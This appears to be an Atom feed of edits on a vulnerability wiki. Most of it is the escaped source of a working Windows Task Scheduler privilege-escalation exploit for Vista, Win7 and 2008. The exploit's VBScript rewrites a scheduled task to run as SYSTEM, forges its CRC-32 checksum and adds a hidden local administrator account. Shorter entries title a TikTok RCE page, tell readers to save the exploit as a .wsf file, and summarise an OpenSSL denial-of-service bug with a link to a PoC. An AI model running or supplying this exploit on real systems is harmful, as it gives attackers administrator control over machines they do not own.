0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,&lt;br /&gt;
0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,&lt;br /&gt;
0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,&lt;br /&gt;
0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,&lt;br /&gt;
0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,&lt;br /&gt;
0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,&lt;br /&gt;
0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A,&lt;br /&gt;
0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599,&lt;br /&gt;
0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,&lt;br /&gt;
0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190,&lt;br /&gt;
0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F,&lt;br /&gt;
0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E,&lt;br /&gt;
0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,&lt;br /&gt;
0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED,&lt;br /&gt;
0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,&lt;br /&gt;
0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3,&lt;br /&gt;
0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,&lt;br /&gt;
0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A,&lt;br /&gt;
0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5,&lt;br /&gt;
0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010,&lt;br /&gt;
0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,&lt;br /&gt;
0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17,&lt;br /&gt;
0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6,&lt;br /&gt;
0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615,&lt;br /&gt;
0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,&lt;br /&gt;
0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344,&lt;br /&gt;
0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,&lt;br /&gt;
0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A,&lt;br /&gt;
0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,&lt;br /&gt;
0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1,&lt;br /&gt;
0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C,&lt;br /&gt;
0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF,&lt;br /&gt;
0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,&lt;br /&gt;
0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE,&lt;br /&gt;
0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31,&lt;br /&gt;
0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C,&lt;br /&gt;
0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,&lt;br /&gt;
0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B,&lt;br /&gt;
0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,&lt;br /&gt;
0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1,&lt;br /&gt;
0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,&lt;br /&gt;
0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278,&lt;br /&gt;
0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7,&lt;br /&gt;
0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66,&lt;br /&gt;
0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,&lt;br /&gt;
0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605,&lt;br /&gt;
0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8,&lt;br /&gt;
0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B,&lt;br /&gt;
0x2D02EF8D&lt;br /&gt;
);&lt;br /&gt;
&lt;br /&gt;
var hD='0123456789ABCDEF';&lt;br /&gt;
&lt;br /&gt;
function dec2hex(d) {&lt;br /&gt;
h='';&lt;br /&gt;
for (i=0;i&amp;lt;8;i++) {&lt;br /&gt;
h = hD.charAt(d&amp;amp;15)+h;&lt;br /&gt;
d &amp;gt;&amp;gt;&amp;gt;= 4;&lt;br /&gt;
}&lt;br /&gt;
return h;&lt;br /&gt;
}&lt;br /&gt;
function encodeToHex(str){&lt;br /&gt;
    var r=&amp;quot;&amp;quot;;&lt;br /&gt;
    var e=str.length;&lt;br /&gt;
    var c=0;&lt;br /&gt;
    var h;&lt;br /&gt;
    while(c&amp;lt;e){&lt;br /&gt;
        h=str.charCodeAt(c++).toString(16);&lt;br /&gt;
        while(h.length&amp;lt;3) h=&amp;quot;0&amp;quot;+h;&lt;br /&gt;
        r+=h;&lt;br /&gt;
    }&lt;br /&gt;
    return r;&lt;br /&gt;
}&lt;br /&gt;
function decodeFromHex(str){&lt;br /&gt;
    var r=&amp;quot;&amp;quot;;&lt;br /&gt;
    var e=str.length;&lt;br /&gt;
    var s=0;&lt;br /&gt;
    while(e&amp;gt;1){&lt;br /&gt;
         &lt;br /&gt;
        r=r+String.fromCharCode(&amp;quot;0x&amp;quot;+str.substring(s,s+2));&lt;br /&gt;
         &lt;br /&gt;
        s=s+2;&lt;br /&gt;
        e=e-2;&lt;br /&gt;
    }&lt;br /&gt;
     &lt;br /&gt;
    return r;&lt;br /&gt;
     &lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
function calc_crc(anyForm) {&lt;br /&gt;
&lt;br /&gt;
anyTextString=decodeFromHex(anyForm);&lt;br /&gt;
&lt;br /&gt;
Crc_value = 0xFFFFFFFF;&lt;br /&gt;
StringLength=anyTextString.length;&lt;br /&gt;
for (i=0; i&amp;lt;StringLength; i++) {&lt;br /&gt;
tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) &amp;amp; 0xFF;&lt;br /&gt;
Table_value = crc_table[tableIndex];&lt;br /&gt;
Crc_value &amp;gt;&amp;gt;&amp;gt;= 8;&lt;br /&gt;
Crc_value ^= Table_value;&lt;br /&gt;
}&lt;br /&gt;
Crc_value ^= 0xFFFFFFFF;&lt;br /&gt;
return dec2hex(Crc_value);&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
function rev_crc(leadString,endString,crc32) {&lt;br /&gt;
//&lt;br /&gt;
// First, we calculate the CRC-32 for the initial string&lt;br /&gt;
//&lt;br /&gt;
    anyTextString=decodeFromHex(leadString);&lt;br /&gt;
     &lt;br /&gt;
   Crc_value = 0xFFFFFFFF;&lt;br /&gt;
   StringLength=anyTextString.length;&lt;br /&gt;
   //document.write(alert(StringLength));&lt;br /&gt;
   for (var i=0; i&amp;lt;StringLength; i++) {&lt;br /&gt;
      tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) &amp;amp; 0xFF;&lt;br /&gt;
      Table_value = crc_table[tableIndex];&lt;br /&gt;
      Crc_value &amp;gt;&amp;gt;&amp;gt;= 8;&lt;br /&gt;
      Crc_value ^= Table_value;&lt;br /&gt;
   }&lt;br /&gt;
//&lt;br /&gt;
// Second, we calculate the CRC-32 without the final string&lt;br /&gt;
//&lt;br /&gt;
   crc=parseInt(crc32,16);&lt;br /&gt;
   crc ^= 0xFFFFFFFF;&lt;br /&gt;
   anyTextString=decodeFromHex(endString);&lt;br /&gt;
   StringLength=anyTextString.length;&lt;br /&gt;
   for (var i=0; i&amp;lt;StringLength; i++) {&lt;br /&gt;
      tableIndex=0;&lt;br /&gt;
      Table_value = crc_table[tableIndex];&lt;br /&gt;
      while (((Table_value ^ crc) &amp;gt;&amp;gt;&amp;gt; 24) &amp;amp; 0xFF) {&lt;br /&gt;
         tableIndex++;&lt;br /&gt;
         Table_value = crc_table[tableIndex];&lt;br /&gt;
      }&lt;br /&gt;
      crc ^= Table_value;&lt;br /&gt;
      crc &amp;lt;&amp;lt;= 8;&lt;br /&gt;
      crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1);&lt;br /&gt;
   }&lt;br /&gt;
//&lt;br /&gt;
// Now let's find the 4-byte string&lt;br /&gt;
//&lt;br /&gt;
   for (var i=0; i&amp;lt;4; i++) {&lt;br /&gt;
      tableIndex=0;&lt;br /&gt;
      Table_value = crc_table[tableIndex];&lt;br /&gt;
      while (((Table_value ^ crc) &amp;gt;&amp;gt;&amp;gt; 24) &amp;amp; 0xFF) {&lt;br /&gt;
         tableIndex++;&lt;br /&gt;
         Table_value = crc_table[tableIndex];&lt;br /&gt;
      }&lt;br /&gt;
      crc ^= Table_value;&lt;br /&gt;
      crc &amp;lt;&amp;lt;= 8;&lt;br /&gt;
      crc |= tableIndex;&lt;br /&gt;
   }&lt;br /&gt;
   crc ^= Crc_value;&lt;br /&gt;
//&lt;br /&gt;
// Finally, display the results&lt;br /&gt;
//&lt;br /&gt;
   var TextString=dec2hex(crc);&lt;br /&gt;
   var Teststring='';&lt;br /&gt;
Teststring=TextString.substring(6,8);&lt;br /&gt;
Teststring+=TextString.substring(4,6);&lt;br /&gt;
Teststring+=TextString.substring(2,4);&lt;br /&gt;
Teststring+=TextString.substring(0,2);&lt;br /&gt;
   return Teststring&lt;br /&gt;
}&lt;br /&gt;
function decodeFromHex(str){&lt;br /&gt;
    var r=&amp;quot;&amp;quot;;&lt;br /&gt;
    var e=str.length;&lt;br /&gt;
    var s=0;&lt;br /&gt;
    while(e&amp;gt;1){&lt;br /&gt;
         &lt;br /&gt;
        r=r+String.fromCharCode(&amp;quot;0x&amp;quot;+str.substring(s,s+2));&lt;br /&gt;
         &lt;br /&gt;
        s=s+2;&lt;br /&gt;
        e=e-2;&lt;br /&gt;
    }&lt;br /&gt;
     &lt;br /&gt;
    return r;&lt;br /&gt;
     &lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;script language=&amp;quot;VBScript&amp;quot;&amp;gt;&lt;br /&gt;
dim output&lt;br /&gt;
set output = wscript.stdout&lt;br /&gt;
output.writeline &amp;quot; Task Scheduler 0 day - Privilege Escalation &amp;quot;&lt;br /&gt;
output.writeline &amp;quot; Should work on Vista/Win7/2008 x86/x64&amp;quot;&lt;br /&gt;
output.writeline &amp;quot; webDEViL - w3bd3vil [at] gmail [dot] com&amp;quot; &amp;amp; vbCr &amp;amp; vbLf&lt;br /&gt;
biatchFile = WScript.CreateObject(&amp;quot;Scripting.FileSystemObject&amp;quot;).GetSpecialFolder(2)+&amp;quot;\xpl.bat&amp;quot;&lt;br /&gt;
Set objShell = CreateObject(&amp;quot;WScript.Shell&amp;quot;)&lt;br /&gt;
objShell.Run &amp;quot;schtasks /create /TN wDw00t /sc monthly /tr &amp;quot;&amp;quot;&amp;quot;+biatchFile+&amp;quot;&amp;quot;&amp;quot;&amp;quot;,,True&lt;br /&gt;
&lt;br /&gt;
Set fso = CreateObject(&amp;quot;Scripting.FileSystemObject&amp;quot;)&lt;br /&gt;
Set a = fso.CreateTextFile(biatchFile, True)&lt;br /&gt;
a.WriteLine (&amp;quot;net user /add test123 test123&amp;quot;)&lt;br /&gt;
a.WriteLine (&amp;quot;net localgroup administrators /add test123&amp;quot;)&lt;br /&gt;
a.WriteLine (&amp;quot;schtasks /delete /f /TN wDw00t&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
Function ReadByteArray(strFileName)&lt;br /&gt;
Const adTypeBinary = 1&lt;br /&gt;
Dim bin&lt;br /&gt;
    Set bin = CreateObject(&amp;quot;ADODB.Stream&amp;quot;)&lt;br /&gt;
    bin.Type = adTypeBinary&lt;br /&gt;
    bin.Open&lt;br /&gt;
    bin.LoadFromFile strFileName&lt;br /&gt;
    ReadByteArray = bin.Read&lt;br /&gt;
'output.writeline ReadByteArray&lt;br /&gt;
End Function&lt;br /&gt;
&lt;br /&gt;
Function OctetToHexStr (arrbytOctet)&lt;br /&gt;
Dim k&lt;br /&gt;
OctetToHexStr = &amp;quot;&amp;quot;&lt;br /&gt;
For k = 3 To Lenb (arrbytOctet)&lt;br /&gt;
OctetToHexStr = OctetToHexStr _&lt;br /&gt;
        &amp;amp; Right(&amp;quot;0&amp;quot; &amp;amp; Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)&lt;br /&gt;
Next&lt;br /&gt;
End Function&lt;br /&gt;
strFileName=&amp;quot;C:\windows\system32\tasks\wDw00t&amp;quot;&lt;br /&gt;
&lt;br /&gt;
hexXML = OctetToHexStr (ReadByteArray(strFileName))&lt;br /&gt;
'output.writeline hexXML&lt;br /&gt;
crc32 = calc_crc(hexXML)&lt;br /&gt;
output.writeline &amp;quot;Crc32 original: &amp;quot;+crc32&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set xmlDoc = CreateObject(&amp;quot;Microsoft.XMLDOM&amp;quot;)&lt;br /&gt;
'permissions workaround&lt;br /&gt;
'objShell.Run &amp;quot;cmd /c copy C:\windows\system32\tasks\wDw00t .&amp;quot;,,True&lt;br /&gt;
'objShell.Run &amp;quot;cmd /c schtasks /query /XML /TN wDw00t &amp;gt; wDw00t.xml&amp;quot;,,True&lt;br /&gt;
Set objShell = WScript.CreateObject(&amp;quot;WScript.Shell&amp;quot;)&lt;br /&gt;
Set objExecObject = objShell.Exec(&amp;quot;cmd /c schtasks /query /XML /TN wDw00t&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
Do Until objExecObject.StdOut.AtEndOfStream&lt;br /&gt;
strLine = strLine &amp;amp; objExecObject.StdOut.ReadLine()&lt;br /&gt;
Loop&lt;br /&gt;
hexXML = &amp;quot;FFFE3C00&amp;quot;+OctetToHexStr(strLine)&lt;br /&gt;
'output.writeline hexXML&lt;br /&gt;
Set ts = fso.createtextfile (&amp;quot;wDw00t.xml&amp;quot;)&lt;br /&gt;
For n = 1 To (Len (hexXML) - 1) step 2&lt;br /&gt;
ts.write Chr (&amp;quot;&amp;amp;h&amp;quot; &amp;amp; Mid (hexXML, n, 2))&lt;br /&gt;
Next&lt;br /&gt;
ts.close&lt;br /&gt;
&lt;br /&gt;
xmlDoc.load &amp;quot;wDw00t.xml&amp;quot;&lt;br /&gt;
Set Author = xmlDoc.selectsinglenode (&amp;quot;//Task/RegistrationInfo/Author&amp;quot;)&lt;br /&gt;
Author.text = &amp;quot;LocalSystem&amp;quot;&lt;br /&gt;
Set UserId = xmlDoc.selectsinglenode (&amp;quot;//Task/Principals/Principal/UserId&amp;quot;)&lt;br /&gt;
UserId.text = &amp;quot;S-1-5-18&amp;quot;&lt;br /&gt;
xmldoc.save(strFileName)&lt;br /&gt;
&lt;br /&gt;
hexXML = OctetToHexStr (ReadByteArray(strFileName))&lt;br /&gt;
&lt;br /&gt;
leadString=hexXML+&amp;quot;3C0021002D002D00&amp;quot;&lt;br /&gt;
endString=&amp;quot;2D002D003E00&amp;quot;&lt;br /&gt;
'output.writeline leadString&lt;br /&gt;
impbytes=rev_crc(leadString,endString,crc32)&lt;br /&gt;
output.writeline &amp;quot;Crc32 Magic Bytes: &amp;quot;+impbytes&lt;br /&gt;
&lt;br /&gt;
finalString = leadString+impbytes+endString&lt;br /&gt;
forge = calc_crc(finalString)&lt;br /&gt;
output.writeline &amp;quot;Crc32 Forged: &amp;quot;+forge&lt;br /&gt;
&lt;br /&gt;
strHexString=&amp;quot;FFFE&amp;quot;+finalString&lt;br /&gt;
Set fso = CreateObject (&amp;quot;scripting.filesystemobject&amp;quot;)&lt;br /&gt;
Set stream = CreateObject (&amp;quot;adodb.stream&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
Set ts = fso.createtextfile (strFileName)&lt;br /&gt;
&lt;br /&gt;
For n = 1 To (Len (strHexString) - 1) step 2&lt;br /&gt;
ts.write Chr (&amp;quot;&amp;amp;h&amp;quot; &amp;amp; Mid (strHexString, n, 2))&lt;br /&gt;
Next&lt;br /&gt;
ts.close&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set objShell = CreateObject(&amp;quot;WScript.Shell&amp;quot;)&lt;br /&gt;
objShell.Run &amp;quot;schtasks /change /TN wDw00t /disable&amp;quot;,,True&lt;br /&gt;
objShell.Run &amp;quot;schtasks /change /TN wDw00t /enable&amp;quot;,,True&lt;br /&gt;
objShell.Run &amp;quot;schtasks /run /TN wDw00t&amp;quot;,,True&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/job&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:%E5%AE%89%E5%8D%93%E7%89%88TikTok_RCE%E6%BC%8F%E6%B4%9E/Page_display_title/en&amp;diff=1919</id>
		<title>Translations:安卓版TikTok RCE漏洞/Page display title/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:%E5%AE%89%E5%8D%93%E7%89%88TikTok_RCE%E6%BC%8F%E6%B4%9E/Page_display_title/en&amp;diff=1919"/>
		<updated>2021-04-29T03:30:28Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;TikTok for Android Remote Code Execution Vulnerability&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TikTok for Android Remote Code Execution Vulnerability&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:Windows7/win2008%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%870day/1/en&amp;diff=1918</id>
		<title>Translations:Windows7/win2008特權提升0day/1/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:Windows7/win2008%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%870day/1/en&amp;diff=1918"/>
		<updated>2021-04-29T03:27:02Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;Save the exploit as &amp;lt;code&amp;gt;taskxpl.wsf&amp;lt;/code&amp;gt;&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Save the exploit as &amp;lt;code&amp;gt;taskxpl.wsf&amp;lt;/code&amp;gt;&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:Windows7/win2008%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%870day/Page_display_title/en&amp;diff=1917</id>
		<title>Translations:Windows7/win2008特權提升0day/Page display title/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:Windows7/win2008%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%870day/Page_display_title/en&amp;diff=1917"/>
		<updated>2021-04-29T03:26:12Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;Windows 7/Win2008 elevation of privilege zero-day vulnerability&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Windows 7/Win2008 elevation of privilege zero-day vulnerability&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2021-3449_OpenSSL%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E/en&amp;diff=1916</id>
		<title>CVE-2021-3449 OpenSSL拒絕服務漏洞/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2021-3449_OpenSSL%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E/en&amp;diff=1916"/>
		<updated>2021-04-29T03:02:48Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;openssl versions below 1.1.1-k, maliciously constructed requests using openssl software (including nginx and trojan-gfw, etc.) in the default configuration can crash the server.&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Vulnerability Impact==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt; 1.1.1-k&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Vulnerability information==&lt;br /&gt;
openssl versions below 1.1.1-k, maliciously constructed requests using openssl software (including nginx and trojan-gfw, etc.) in the default configuration can crash the server.&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
https://github.com/terorie/cve-2021-3449&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:CVE-2021-3449_OpenSSL%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E/Page_display_title/en&amp;diff=1915</id>
		<title>Translations:CVE-2021-3449 OpenSSL拒絕服務漏洞/Page display title/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:CVE-2021-3449_OpenSSL%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E/Page_display_title/en&amp;diff=1915"/>
		<updated>2021-04-29T03:02:20Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;CVE-2021-3449 OpenSSL Denial of Service Vulnerability&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;CVE-2021-3449 OpenSSL Denial of Service Vulnerability&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:CVE-2021-3449_OpenSSL%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E/1/en&amp;diff=1914</id>
		<title>Translations:CVE-2021-3449 OpenSSL拒絕服務漏洞/1/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:CVE-2021-3449_OpenSSL%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E/1/en&amp;diff=1914"/>
		<updated>2021-04-29T03:02:16Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;==Vulnerability Impact==&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Vulnerability Impact==&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:CVE-2021-3449_OpenSSL%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E/2/en&amp;diff=1913</id>
		<title>Translations:CVE-2021-3449 OpenSSL拒絕服務漏洞/2/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:CVE-2021-3449_OpenSSL%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E/2/en&amp;diff=1913"/>
		<updated>2021-04-29T03:02:13Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;==Vulnerability information==&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Vulnerability information==&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:CVE-2021-3449_OpenSSL%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E/3/en&amp;diff=1912</id>
		<title>Translations:CVE-2021-3449 OpenSSL拒絕服務漏洞/3/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:CVE-2021-3449_OpenSSL%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E/3/en&amp;diff=1912"/>
		<updated>2021-04-29T03:02:08Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;openssl versions below 1.1.1-k, maliciously constructed requests using openssl software (including nginx and trojan-gfw, etc.) in the default configuration can crash the server.&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;openssl versions below 1.1.1-k, maliciously constructed requests using openssl software (including nginx and trojan-gfw, etc.) in the default configuration can crash the server.&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
</feed>